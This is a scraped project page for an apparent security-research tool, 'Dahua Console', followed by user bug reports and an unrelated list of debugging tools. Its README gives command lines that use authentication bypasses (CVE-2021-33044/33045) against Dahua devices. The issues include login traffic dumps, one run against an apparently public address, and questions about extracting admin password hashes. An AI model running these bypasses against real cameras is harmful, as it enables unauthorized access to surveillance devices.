Dahua Console, access internal debug console and/or other researched functions in Dahua devices.

bashis

Last update: Dec 28, 2022

Related tags

Debugging Tools dahua

Overview

Dahua Console

Version: Pre-alpha
Bugs: Indeed
TODO: Lots of stuff

[Install requirements]

sudo pip3 install -r requirements.txt

[Arguments]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://
   
    :
    
     @
     
      :
      
       
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Release]

[Update]

2021-10-07

Details here: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocol needed: DHIP or HTTP/HTTPS (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocol needed: DHIP (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Comments

imou ranger 2 errors

./env/bin/python Console.py --auth admin:XXXXXX --rhost 192.168.124.196 --proto dhip --rport 80 -d [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "default" with proto "dhip" at 192.168.124.196:80 [+] Opening connection to 192.168.124.196 on port 80: Done [-] Dahua Debug Console: Trying [+] Login: Success [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000 {"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|00000000|eb000000|00000000|eb000000|00000000 {"result":false,"params":{"realm":"Login to EB2711F0F250EAB5","random":"80480036-1e1f-4669-812b-70d7470d6025","encryption":"Default"},"error":{"code":268632079,"message":"Component error: login challenge!"},"id":0,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|01000000|09010000|00000000|09010000|00000000 {"method": "global.login", "params": {"userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Direct", "clientType": "Console", "authorityType": "Default", "passwordType": "Default", "password": "5D62F915E62F3BC989F6A31E27C"}, "id": 1, "session": 2845467865} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|01000000|4d000000|00000000|4d000000|00000000 {"result":true,"params":{"keepAliveInterval":30},"id":1,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|02000000|5e000000|00000000|5e000000|00000000 {"method": "userManager.getActiveUserInfoAll", "params": null, "id": 2, "session": 2845467865} [+] keepAlive thread: Started [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|02000000|c4000000|00000000|c4000000|00000000 {"result":true,"params":{"users":[{"Id":1,"Name":"admin","Group":"admin","ClientType":"RemoteRPC","ClientAddress":"192.168.123.10","LoginTime":"2022-05-13 19:00:25"}]},"id":2,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [*] [Active Users] [email protected] since 2022-05-13 19:00:25 with "RemoteRPC" (Id: 1) [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|06000000|4c010000|00000000|4c010000|00000000 {"method": "system.multicall", "params": [{"method": "magicBox.getDeviceType", "params": null, "id": 3, "session": 2845467865}, {"method": "magicBox.getDeviceClass", "params": null, "id": 4, "session": 2845467865}, {"method": "global.getCurrentTime", "params": null, "id": 5, "session": 2845467865}], "id": 6, "session": 2845467865} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|06000000|da000000|00000000|da000000|00000000 {"result":true,"params":[{"result":true,"id":3,"params":{"type":"IPC-A22E-B"}},{"result":true,"id":4,"params":{"type":"IPC"}},{"result":true,"id":5,"params":{"time":"2022-05-13 19:00:25"}}],"id":6,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [*] Remote Model: IPC-A22E-B, Class: IPC, Time: 2022-05-13 19:00:25 [BEGIN SEND (192.168.124.196)] <------------------1801------------------> 20000000|44484950|d9649aa9|07000000|50000000|00000000|50000000|00000000 {"method": "system.listService", "params": null, "id": 7, "session": 2845467865} [ END SEND (192.168.124.196)] <------------------1801------------------> [BEGIN RECV (192.168.124.196)] <------------------1917------------------> 20000000|44484950|d9649aa9|07000000|65000000|00000000|65000000|00000000 {"result":false,"error":{"code":268632064,"message":"InterfaceNotFound"},"id":7,"session":2845467865} [ END RECV (192.168.124.196)] <------------------1917------------------> [Console]# services [-] Invalid command: 'help' for help [Console]# service Traceback (most recent call last): File "/home/msw/soft/DahuaConsole/Console.py", line 852, in main() File "/home/msw/soft/DahuaConsole/Console.py", line 846, in main DebugConsole(dargs=dargs) File "/home/msw/soft/DahuaConsole/Console.py", line 28, in init self.main_console() File "/home/msw/soft/DahuaConsole/Console.py", line 239, in main_console exec(tmp) File "", line 1, in File "/home/msw/soft/DahuaConsole/dahua.py", line 97, in list_service self.check_for_service('dump') File "/home/msw/soft/DahuaConsole/net.py", line 1163, in check_for_service if not len(self.RemoteServicesCache): TypeError: object of type 'bool' has no len() [*] Closed connection to 192.168.124.196 port 80

opened by luzik 7
AttributeError("'NoneType' object has no attribute 'get'")

Hi, i'm trying to connect to https://www.dahuasecurity.com/products/All-Products/Access-Control--Time-Attendance/Access-Control/Standalone/ASI1201E/ASI1201E-D

but i get this error. PS: I am looking for a way to connect it to homeassistant.

./Console.py --logon netkeyboard --rhost 192.168.90.5 --rport 37777 --auth admin:****** -d [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "netkeyboard" with proto "dhip" at 192.168.90.5:37777 [+] Opening connection to 192.168.90.5 on port 37777: Done [./......] Dahua Debug Console: Trying [+] Login: Success [BEGIN SEND (192.168.90.5)] <------------------1803------------------> 20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000 {"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0} [ END SEND (192.168.90.5)] <------------------1803------------------> [BEGIN RECV (192.168.90.5)] <------------------1919------------------> 20000000|44484950|d710c601|00000000|ac000000|00000000|ac000000|00000000 { "result": false, "params": { "realm": "Login to ASI1201E", "random": "29757655", "encryption": "Default" }, "error": { "code": 268632079 }, "id": 0, "session": 29757655 } [ END RECV (192.168.90.5)] <------------------1919------------------> [BEGIN SEND (192.168.90.5)] <------------------1803------------------> 20000000|44484950|d710c601|01000000|0b010000|00000000|0b010000|00000000 {"method": "global.login", "params": {"userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "61C31760B8AAB860833EE2083568AA60"}, "id": 1, "session": 29757655} [ END SEND (192.168.90.5)] <------------------1803------------------> [BEGIN RECV (192.168.90.5)] <------------------1919------------------> 20000000|44484950|d710c601|01000000|40000000|00000000|40000000|00000000 { "result": true, "params": null, "id": 1, "session": 29757655 } [ END RECV (192.168.90.5)] <------------------1919------------------> [BEGIN SEND (192.168.90.5)] <------------------1803------------------> 20000000|44484950|d710c601|02000000|5c000000|00000000|5c000000|00000000 {"method": "userManager.getActiveUserInfoAll", "params": null, "id": 2, "session": 29757655} [ END SEND (192.168.90.5)] <------------------1803------------------> [+] keepAlive thread: Started [BEGIN RECV (192.168.90.5)] <------------------1919------------------> 20000000|44484950|d710c601|02000000|2c000000|00000000|2c000000|00000000 { "result": false, "id": 2, "params": null } [ END RECV (192.168.90.5)] <------------------1919------------------> AttributeError("'NoneType' object has no attribute 'get'") [-] [MainConsole] [*] All done [*] Closed connection to 192.168.90.5 port 37777

opened by smsalert-mobi 5
Password hash

I remotely connected to the DVR and got access to the console which allows me to execute some commands. Along with this, I see the inscription "Attack console failed. Using local only". Why do I see this inscription but at the same time I can use the console and get some information about the device. What command should I use to add a new user or get the password hash from the admin user?

opened by Yev-henii 3

could not use 'diag nfs mount'

_[Console]# diag 
[*] [usage]
    diag nfs status (Check if NFS mounted)
    diag nfs mount [<server host> /<server path>]
    diag nfs umount (Umount NFS)
    diag usb get (Not done yet)
    diag usb set (Not done yet)
    diag pcap start (Start capture)
    diag pcap stop (Stop capture)
    diag pcap filter <get> | <set> <lo|eth0|eth2> <host>
    diag coredump start (Start coredump support)
    diag coredump stop (Stop coredump support)
    diag logs start (Start redirect logs to NFS)
    diag logs stop (Stop redirect logs to NFS)
[Console]# diag nfs mount 10.2.1.110 /c/public
[-] Service [InterimRemoteDiagnose] not supported on remote device
[Console]# diag nfs mount 10.2.1.110 /c/public/
[-] Service [InterimRemoteDiagnose] not supported on remote device
[Console]# diag nfs mount 10.2.1.110 /c/public/
[-] Service [InterimRemoteDiagnose] not supported on remote device
[Console]# diag nfs mount 10.2.1.110 /c/
[-] Service [InterimRemoteDiagnose] not supported on remote device
[Console]# diag nfs mount 10.2.1.110 /c/
[-] Service [InterimRemoteDiagnose] not supported on remote device
[Console]# diag nfs mount 10.2.1.110 /c/public
[-] Service [InterimRemoteDiagnose] not supported on remote device_

can somebody help me with this 'diag nfs mount' my nfs server is ok, i can test it on my centos7.6 server like : mount -o nolock -t 10.2.1.110:/c/public /mnt

opened by whysoga 2

AttributeError("'bool' object has no attribute 'get'")

└─$ python3 Console.py --logon netkeyboard --rhost --rport 8081 --proto http [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "netkeyboard" with proto "http" at [▘] Dahua Debug Console: Trying [+] Login: Success [+] keepAlive thread: Started AttributeError("'bool' object has no attribute 'get'") [-] [MainConsole] [*] All done

Using Linux and latest version of Console.

opened by ghost 2
Access to OS

using this cve I get access to certain functions of the camera, but there is no way to access the operating system of the camera. Is it possible to access the operating system of the camera through Console.py?

opened by h-moody 1
global.getCurrentTime does not exist on every camera, crashing program
Hi,

Just to let you (and anyone else who may have the same problem) know, on line 490 of net.py there is:

dh_data.get('global.getCurrentTime').get('params').get('time'),

This is not working with my camera. Maybe because mine firmware is from 2014.

So anyway, I changed:

log.info("Remote Model: {}, Class: {}, Time: {}".format( self.DeviceType, self.DeviceClass, dh_data.get('global.getCurrentTime').get('params').get('time'), ))

To:

log.info("Remote Model: {}, Class: {}".format( self.DeviceType, self.DeviceClass ))

And it's working. I'd open pull request for that, but it's already late for me. You can change this in your code if you want.
opened by LukaszMoskala 1
TypeError: expected string or bytes-like object When used http proto

python3 Console.py --logon netkeyboard --rhost 79.179.42.47 --proto http --rport 80 [*] [Dahua Debug Console 2019-2021 bashis ] [*] logon type "netkeyboard" with proto "http" at 79.179.42.47:80 [▘] Dahua Debug Console: Trying [/] Login Traceback (most recent call last): File "/root/Desktop/tools/DahuaConsole/Console.py", line 852, in main() File "/root/Desktop/tools/DahuaConsole/Console.py", line 846, in main DebugConsole(dargs=dargs) File "/root/Desktop/tools/DahuaConsole/Console.py", line 28, in init self.main_console() File "/root/Desktop/tools/DahuaConsole/Console.py", line 194, in main_console if not self.connect_rhost( File "/root/Desktop/tools/DahuaConsole/connection.py", line 87, in connect_rhost if not dh.dh_connect(username=username, password=password, logon=logon, force=self.dargs.force): File "/root/Desktop/tools/DahuaConsole/net.py", line 431, in dh_connect if not self.dahua_dhip_login(username=username, password=password, logon=logon, force=force): File "/root/Desktop/tools/DahuaConsole/net.py", line 2056, in dahua_dhip_login dh_data = self.send_call(query_args, errorcodes=True, login=True) File "/root/Desktop/tools/DahuaConsole/net.py", line 707, in send_call dh_data = self.p2p(query_args, login=login) File "/root/Desktop/tools/DahuaConsole/net.py", line 1747, in p2p dh_data = self.remote.send(query_args=packet, login=login, timeout=20) File "/root/Desktop/tools/DahuaConsole/relay.py", line 156, in send dh_data = self.post(self._get_url(login, url), query_args, timeout) File "/root/Desktop/tools/DahuaConsole/relay.py", line 235, in post return self.remote.post(self.uri + url, json=query_args, verify=False, allow_redirects=False, timeout=timeout) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 590, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 528, in request prep = self.prepare_request(req) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 456, in prepare_request p.prepare( File "/usr/local/lib/python3.9/dist-packages/requests/models.py", line 318, in prepare self.prepare_cookies(cookies) File "/usr/local/lib/python3.9/dist-packages/requests/models.py", line 575, in prepare_cookies cookie_header = get_cookie_header(self._cookies, self) File "/usr/local/lib/python3.9/dist-packages/requests/cookies.py", line 142, in get_cookie_header jar.add_cookie_header(r) File "/usr/lib/python3.9/http/cookiejar.py", line 1367, in add_cookie_header attrs = self._cookie_attrs(cookies) File "/usr/lib/python3.9/http/cookiejar.py", line 1326, in _cookie_attrs self.non_word_re.search(cookie.value) and version > 0): TypeError: expected string or bytes-like object [*] DahuaHttp DELETE

opened by zlgxzswjy 0

Owner

bashis

nobody

GitHub

A configurable set of panels that display various debug information about the current request/response.

Django Debug Toolbar The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/respons

7.3k Dec 31, 2022

🍦 Never use print() to debug again.

IceCream -- Never use print() to debug again Do you ever use print() or log() to debug your code? Of course you do. IceCream, or ic for short, makes p

6.5k Jan 7, 2023

A configurable set of panels that display various debug information about the current request/response.

Django Debug Toolbar The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/respons

7.3k Dec 29, 2022

An x86 old-debug-like program.

1 Jan 10, 2022

Full-screen console debugger for Python

PuDB: a console-based visual debugger for Python Its goal is to provide all the niceties of modern GUI-based debuggers in a more lightweight and keybo

2.6k Jan 1, 2023

Middleware that Prints the number of DB queries to the runserver console.

Django Querycount Inspired by this post by David Szotten, this project gives you a middleware that prints DB query counts in Django's runserver consol

332 Dec 23, 2022

Arghonaut is an interactive interpreter, visualizer, and debugger for Argh! and Aargh!

Arghonaut Arghonaut is an interactive interpreter, visualizer, and debugger for Argh! and Aargh!, which are Befunge-like esoteric programming language

2 Dec 10, 2021

Debugger capable of attaching to and injecting code into python processes.

DISCLAIMER: This is not an official google project, this is just something I wrote while at Google. Pyringe What this is Pyringe is a python debugger

1.6k Dec 15, 2022

🔥 Pyflame: A Ptracing Profiler For Python. This project is deprecated and not maintained.

Pyflame: A Ptracing Profiler For Python (This project is deprecated and not maintained.) Pyflame is a high performance profiling tool that generates f

3k Jan 7, 2023

Parsing ELF and DWARF in Python

pyelftools pyelftools is a pure-Python library for parsing and analyzing ELF files and DWARF debugging information. See the User's guide for more deta

1.6k Jan 4, 2023

Code2flow generates call graphs for dynamic programming language. Code2flow supports Python, Javascript, Ruby, and PHP.

3k Jan 1, 2023

AryaBota: An app to teach Python coding via gradual programming and visual output

AryaBota An app to teach Python coding, that gradually allows students to transition from using commands similar to natural language, to more Pythonic

5 Feb 8, 2022

Full featured multi arch/os debugger built on top of PyQt5 and frida

1.1k Dec 26, 2022

VizTracer is a low-overhead logging/debugging/profiling tool that can trace and visualize your python code execution.

2.8k Jan 8, 2023

A package containing a lot of useful utilities for Python developing and debugging.

Vpack A package containing a lot of useful utilities for Python developing and debugging. Features Sigview: press Ctrl+C to print the current stack in

16 Aug 18, 2022

A web-based visualization and debugging platform for NuPIC

Cerebro 2 A web-based visualization and debugging platform for NuPIC. Usage Set up cerebro2.server to export your model state. Then, run: cd static py

24 Oct 13, 2021

Trace all method entries and exits, the exit also prints the return value, if it is of basic type

Trace all method entries and exits, the exit also prints the return value, if it is of basic type. The apk must have set the android:debuggable="true" flag.

7 Aug 10, 2022

Sane color handling of osx's accent and highlight color from the commandline

osx-colors Sane command line color customisation for osx, no more fiddling about with defaults, internal apple color constants and rgb color codes Say

8 Nov 17, 2022

The official code of LM-Debugger, an interactive tool for inspection and intervention in transformer-based language models.

LM-Debugger is an open-source interactive tool for inspection and intervention in transformer-based language models. This repository includes the code

110 Dec 28, 2022